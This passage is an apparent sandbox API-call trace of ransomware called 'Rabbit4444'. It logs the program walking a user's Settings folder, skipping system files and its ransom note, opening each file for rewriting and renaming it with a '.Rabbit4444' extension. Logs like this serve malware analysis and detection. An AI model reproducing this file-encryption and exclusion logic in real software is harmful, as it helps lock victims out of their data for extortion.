(normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.514] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x562d60c0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x562d60c0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", cAlternateFileName="CLED85~1.SET")) returned 1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2=".") returned 1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2="..") returned 1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2="windows") returned -1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2="boot") returned 1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.514] lstrcmpiW (lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.514] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms" | out: lpString1="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms") returned="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms" [0059.514] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.515] lstrlenW (lpString="Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms") returned 64 [0059.515] lstrlenW (lpString="Rabbit4444") returned 10 [0059.515] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.515] lstrlenW (lpString=".dll") returned 4 [0059.515] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.515] lstrlenW (lpString=".lnk") returned 4 [0059.515] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.515] lstrlenW (lpString=".ini") returned 4 [0059.515] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.515] lstrlenW (lpString=".sys") returned 4 [0059.515] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.515] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d1af7f5f-18c1-4143-81e5-edaf02255883}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.515] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.515] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15082595535) returned 1 [0059.515] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=957) returned 1 [0059.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0059.515] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0059.515] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0059.517] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0059.518] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.518] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.518] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.518] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.518] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.519] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.519] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.519] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.519] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15082957711) returned 1 [0059.519] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0059.519] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0059.519] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.519] CloseHandle (hObject=0x298) returned 1 [0059.519] CloseHandle (hObject=0x278) returned 1 [0059.519] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms.Rabbit4444") returned 192 [0059.519] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d1af7f5f-18c1-4143-81e5-edaf02255883}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d1af7f5f-18c1-4143-81e5-edaf02255883}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.520] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56394d00, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x56394d00, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2315dd0d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", cAlternateFileName="CLD075~1.SET")) returned 1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2=".") returned 1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2="..") returned 1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2="windows") returned -1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2="boot") returned 1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.520] lstrcmpiW (lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.520] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms" | out: lpString1="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms") returned="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms" [0059.521] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.521] lstrlenW (lpString="Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms") returned 64 [0059.521] lstrlenW (lpString="Rabbit4444") returned 10 [0059.521] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.521] lstrlenW (lpString=".dll") returned 4 [0059.521] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.521] lstrlenW (lpString=".lnk") returned 4 [0059.521] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.521] lstrlenW (lpString=".ini") returned 4 [0059.521] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.521] lstrlenW (lpString=".sys") returned 4 [0059.521] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.521] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.521] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.521] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15083216675) returned 1 [0059.521] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=827) returned 1 [0059.522] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.522] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0059.522] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x640, lpName=0x0) returned 0x298 [0059.523] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x640) returned 0x70000 [0059.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.523] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.524] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.524] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15083462734) returned 1 [0059.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.524] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0059.524] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.524] CloseHandle (hObject=0x298) returned 1 [0059.524] CloseHandle (hObject=0x278) returned 1 [0059.524] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms.Rabbit4444") returned 192 [0059.524] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.525] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5642d63d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5642d63d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x481, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", cAlternateFileName="CL52B7~1.SET")) returned 1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2=".") returned 1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2="..") returned 1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2="windows") returned -1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2="boot") returned 1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.525] lstrcmpiW (lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.525] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms" | out: lpString1="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms") returned="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms" [0059.525] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.526] lstrlenW (lpString="Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms") returned 64 [0059.526] lstrlenW (lpString="Rabbit4444") returned 10 [0059.526] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.526] lstrlenW (lpString=".dll") returned 4 [0059.526] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.526] lstrlenW (lpString=".lnk") returned 4 [0059.526] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.526] lstrlenW (lpString=".ini") returned 4 [0059.526] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.526] lstrlenW (lpString=".sys") returned 4 [0059.526] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d4690cfe-6a59-4bab-bff7-9ed0d083e798}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.526] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.526] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15083726062) returned 1 [0059.527] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1153) returned 1 [0059.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0059.527] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.527] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0059.529] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0059.530] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.530] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.530] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.530] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.530] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15084104535) returned 1 [0059.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0059.530] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.530] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.531] CloseHandle (hObject=0x298) returned 1 [0059.531] CloseHandle (hObject=0x278) returned 1 [0059.531] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms.Rabbit4444") returned 192 [0059.531] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d4690cfe-6a59-4bab-bff7-9ed0d083e798}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{d4690cfe-6a59-4bab-bff7-9ed0d083e798}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.531] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x564c5f9f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x564c5f9f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x362, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", cAlternateFileName="CL966A~1.SET")) returned 1 [0059.531] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.531] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.531] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.531] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2=".") returned 1 [0059.532] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2="..") returned 1 [0059.532] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2="windows") returned -1 [0059.532] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.532] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.532] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2="boot") returned 1 [0059.532] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.532] lstrcmpiW (lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.532] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms" | out: lpString1="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms") returned="Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms" [0059.532] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.532] 